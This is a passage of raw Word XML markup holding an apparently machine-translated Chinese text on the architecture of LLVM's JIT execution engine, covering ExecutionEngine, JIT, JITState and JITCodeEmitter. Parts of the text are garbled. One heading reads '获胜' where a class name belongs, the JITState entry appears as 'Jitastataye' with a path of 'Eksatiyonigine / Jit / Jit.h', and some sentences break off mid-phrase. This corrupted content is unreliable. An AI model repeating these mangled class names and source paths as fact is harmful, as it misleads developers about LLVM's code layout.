          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>许多项目选择使用LLVM的JIT来提高执行性能。由于某些用例涉及扩展未考虑LLVM指令集设计的成熟代码库，因此存在一些集成策略。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE86AC2" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E54596A" w14:textId="595EE7DF" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="283" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MacRuby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>项目采用的最</w:t>
      </w:r>
      <w:r w:rsidR="00762A93">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">的方法是直接并从一开始就使用LLVM库。 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MacRuby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>从一开始就了解LLVM，并通过直接生成LLVM指令进行操作。此方法最依赖LLVM，并且不会尝试产生辅助执行环境。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F6EF2E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20428FFB" w14:textId="319D8B37" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="515"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>另一种方法是将项目自己的虚拟机指令集转换为LLVM，如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ClamAV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Rubinius</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>项目选择的那样。这两个项目都仅使用LLVM来提高性能，从而实现了自己的指令集，自己的指令格式和自己的虚拟机。转换通常是通过</w:t>
      </w:r>
      <w:r w:rsidR="00762A93">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>visitor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对象实现的，该</w:t>
      </w:r>
      <w:r w:rsidR="00762A93">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>visitor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对象为每个源VM指令调用以发出LLVM指令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349A429D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CFA3DE1" w14:textId="4C229989" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_bookmark6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LLVM代码</w:t>
      </w:r>
      <w:r w:rsidR="00762A93">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>产生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4724A719" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="29"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="642B330F" w14:textId="43189130" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="266" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>一旦实现了指令图，LLVM就可以通过ExecutionEngine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00762A93">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>产生</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>代码了。大多数与平台无关的代码在lib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ExecutionEngine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>中（特别是lib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ExecutionEngine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JIT，在lib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CodeGen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LLVMTargetMachine.cpp中具有目标计算机实现</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>），</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>在lib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> / Target / X86 /中具有平台相关的组件（对于X86）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6852C381" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A230BC5" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="266" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>以下清单试图阐明LLVM执行引擎的高层组织：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D877196" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="101D6C59" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="714"/>
        </w:tabs>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ExecutionEngine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>lib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ExecutionEngine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ExecutionEngine.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D2588A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479B878A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1374"/>
        </w:tabs>
        <w:spacing w:before="73" w:line="256" w:lineRule="auto"/>
        <w:ind w:right="732" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>代表LLVM JIT引擎的基类。当前存在两种实现：JIT和MC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JIT。截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>至2011年7月，MCJ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IT尚不</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>完整，但将使用MC项目[2]。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>本文尚未涉及MCJIT，因为它尚未成熟</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AB9811" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="714"/>
        </w:tabs>
        <w:spacing w:before="15"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>获胜</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35F5A356" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1374"/>
        </w:tabs>
        <w:spacing w:before="37" w:line="261" w:lineRule="auto"/>
        <w:ind w:right="573" w:hanging="360"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JIT类是执行引擎的独立于平台的表示。它的接口提供了请求功能和块的编译，发出全局变量以及注册侦听器（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JITEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对象）以监视JIT发出的功能。 JIT类还通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>BasicBlock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>到void *映射（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>BasicBlockAddresMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）管理LLVM函数及其实际地址之间的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B87E7F2" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="714"/>
        </w:tabs>
        <w:spacing w:before="13"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Jitastataye</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（库</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Eksatiyonigine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> / Jit / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Jit.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D9F041" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1374"/>
        </w:tabs>
        <w:spacing w:before="17" w:line="261" w:lineRule="auto"/>
        <w:ind w:right="570" w:hanging="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JITState类包含在JIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ExecutionEngine中，用于包含对模块和FunctionPassManager的引用。模块用作所有函数和值（类似于转换单元）的容器，而FunctionPassManager是将LLV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>M指令实际编译为本机代码的过程的列表。</w:t>
      </w:r>
      <w:r>
        <w:t>可以在LLVM的特定于目标的位置（例如lib / Target / X86）中找到通过实现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE2B014" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="714"/>
        </w:tabs>
        <w:spacing w:before="12"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JITCodeEmitter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>include</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>llvm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CodeGen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JITCodeEmitter.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7989A729" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1374"/>
        </w:tabs>
        <w:spacing w:before="37" w:line="256" w:lineRule="auto"/>
        <w:ind w:right="658" w:hanging="360"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JITCodeEmitter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>抽象类，它声明两种类型的方法：用于发出机器代码的实际字节以及用于发出诸如跳转表和重定位的辅助结构。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DEBD11" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="714"/>
        </w:tabs>
        <w:spacing w:before="14"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JITEmitter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JITCodeEmitter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>lib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ExecutionEngine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> / JIT / JITEmitter.cpp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0801AD" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1374"/>
        </w:tabs>
        <w:spacing w:before="17" w:line="266" w:lineRule="auto"/>
        <w:ind w:right="945" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JITCodeEm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>itter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
